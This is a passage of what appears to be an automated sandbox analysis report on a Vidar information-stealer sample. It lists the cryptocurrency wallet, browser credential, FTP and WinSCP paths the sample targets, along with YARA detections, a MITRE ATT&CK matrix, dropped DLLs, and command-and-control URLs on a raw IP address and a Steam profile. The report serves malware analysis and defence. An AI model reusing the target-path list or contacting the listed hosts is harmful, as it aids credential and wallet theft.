Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Yara match	File source: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7344, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.file.exe.901038.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.901038.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7264, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7344, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19B8D9E0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,	4_2_19B8D9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19B05910 sqlite3_mprintf,sqlite3_bind_int64,	4_2_19B05910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19ADDB10 sqlite3_initialize,sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,	4_2_19ADDB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A75C70 sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,	4_2_19A75C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19AE1FE0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	4_2_19AE1FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19ADDFC0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_mprintf,sqlite3_bind_text,sqlite3_step,sqlite3_reset,	4_2_19ADDFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19B051D0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	4_2_19B051D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19AF9090 sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_errmsg,sqlite3_mprintf,	4_2_19AF9090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19B1D3B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	4_2_19B1D3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19B055B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	4_2_19B055B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19B8D4F0 sqlite3_bind_value,sqlite3_log,sqlite3_log,sqlite3_log,	4_2_19B8D4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19B814D0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,	4_2_19B814D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19B3D610 sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	4_2_19B3D610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A74820 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_initialize,	4_2_19A74820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19B44D40 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,InitOnceBeginInitialize,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,	4_2_19B44D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A90FB0 sqlite3_result_int64,sqlite3_result_double,sqlite3_result_int,sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,	4_2_19A90FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19AD8200 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,	4_2_19AD8200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19AB8550 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,	4_2_19AB8550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A88680 sqlite3_mprintf,sqlite3_mprintf,sqlite3_initialize,sqlite3_finalize,sqlite3_free,sqlite3_mprintf,sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_int64,	4_2_19A88680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19AB06E0 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,	4_2_19AB06E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A8B400 sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,sqlite3_reset,sqlite3_step,sqlite3_reset,sqlite3_column_int64,	4_2_19A8B400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19B437E0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	4_2_19B437E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19B23770 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	4_2_19B23770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19ABEF30 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,	4_2_19ABEF30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19ADE170 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	4_2_19ADE170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19ACE090 sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	4_2_19ACE090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19ACE200 sqlite3_initialize,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,	4_2_19ACE200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19ADA6F0 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,	4_2_19ADA6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A766C0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_bind_value,sqlite3_free,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	4_2_19A766C0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	411 Process Injection	1 Masquerading	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	411 Process Injection	1 Credentials in Registry	141 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	12 Process Discovery	SMB/Windows Admin Shares	4 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	1 Account Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 System Owner/User Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	3 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	54 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	37%	ReversingLabs	Win32.Trojan.Generic
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\HCFBAFIDAECA\freebl3.dll	0%	ReversingLabs
C:\ProgramData\HCFBAFIDAECA\mozglue.dll	0%	ReversingLabs
C:\ProgramData\HCFBAFIDAECA\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\HCFBAFIDAECA\nss3.dll	0%	ReversingLabs
C:\ProgramData\HCFBAFIDAECA\softokn3.dll	0%	ReversingLabs
C:\ProgramData\HCFBAFIDAECA\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://mozilla.org0/	0%	URL Reputation	safe
https://95.217.246.168KFB	0%	Avira URL Cloud	safe
https://95.217.246.168/IDBKEBFCBFIIIIIECGDAE	0%	Avira URL Cloud	safe
https://95.217.246.168/	0%	Avira URL Cloud	safe
https://95.217.246.168/mozglue.dllP	0%	Avira URL Cloud	safe
https://95.217.246.168	0%	Avira URL Cloud	safe
https://95.217.246.168/msvcp140.dlln	0%	Avira URL Cloud	safe
https://95.217.246.168/0	0%	Avira URL Cloud	safe
https://95.217.246.168/mozglue.dllL	0%	Avira URL Cloud	safe
https://95.217.246.168/vcruntime140.dll	0%	Avira URL Cloud	safe
https://95.217.246.168/freebl3.dll8	0%	Avira URL Cloud	safe
https://95.217.246.168/freebl3.dll2	0%	Avira URL Cloud	safe
https://95.217.246.168/nss3.dllp	0%	Avira URL Cloud	safe
https://95.217.246.168/s:	0%	Avira URL Cloud	safe
https://95.217.246.168/softokn3.dllx	0%	Avira URL Cloud	safe
https://95.217.246.168KJD	0%	Avira URL Cloud	safe
https://95.217.246.168/softokn3.dll	0%	Avira URL Cloud	safe
https://95.217.246.168/nss3.dll	0%	Avira URL Cloud	safe
https://95.217.246.168/nss3.dll&	0%	Avira URL Cloud	safe
https://95.217.246.168/mozglue.dll	0%	Avira URL Cloud	safe
https://95.217.246.168/msvcp140.dll	0%	Avira URL Cloud	safe
https://95.217.246.168/freebl3.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
steamcommunity.com	23.194.234.100	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://95.217.246.168/vcruntime140.dll	false	Avira URL Cloud: safe	unknown
https://95.217.246.168/	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199677575543	false		high
https://95.217.246.168/nss3.dll	false	Avira URL Cloud: safe	unknown
https://95.217.246.168/msvcp140.dll	false	Avira URL Cloud: safe	unknown
https://95.217.246.168/softokn3.dll	false	Avira URL Cloud: safe	unknown
https://95.217.246.168/mozglue.dll	false	Avira URL Cloud: safe	unknown
https://95.217.246.168/freebl3.dll	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	CBAFIDAE.4.dr	false		high
https://duckduckgo.com/ac/?q=	CBAFIDAE.4.dr	false		high
https://95.217.246.168/0	RegAsm.exe, 00000004.00000002.2202047159.00000000012AA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/?subsection=broadcasts	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://steamcommunity.com/profiles/76561199677575543/badges	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://95.217.246.168	76561199677575543[1].htm.4.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=EyWBqDQS-6jg&a	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://95.217.246.168KFB	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://95.217.246.168/IDBKEBFCBFIIIIIECGDAE	RegAsm.exe, 00000004.00000002.2202047159.00000000012AA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.valvesoftware.com/legal.htm	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://steamcommunity.com/profiles/76561199677575543/inventory/	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe	RegAsm.exe, 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&am	RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	false		high
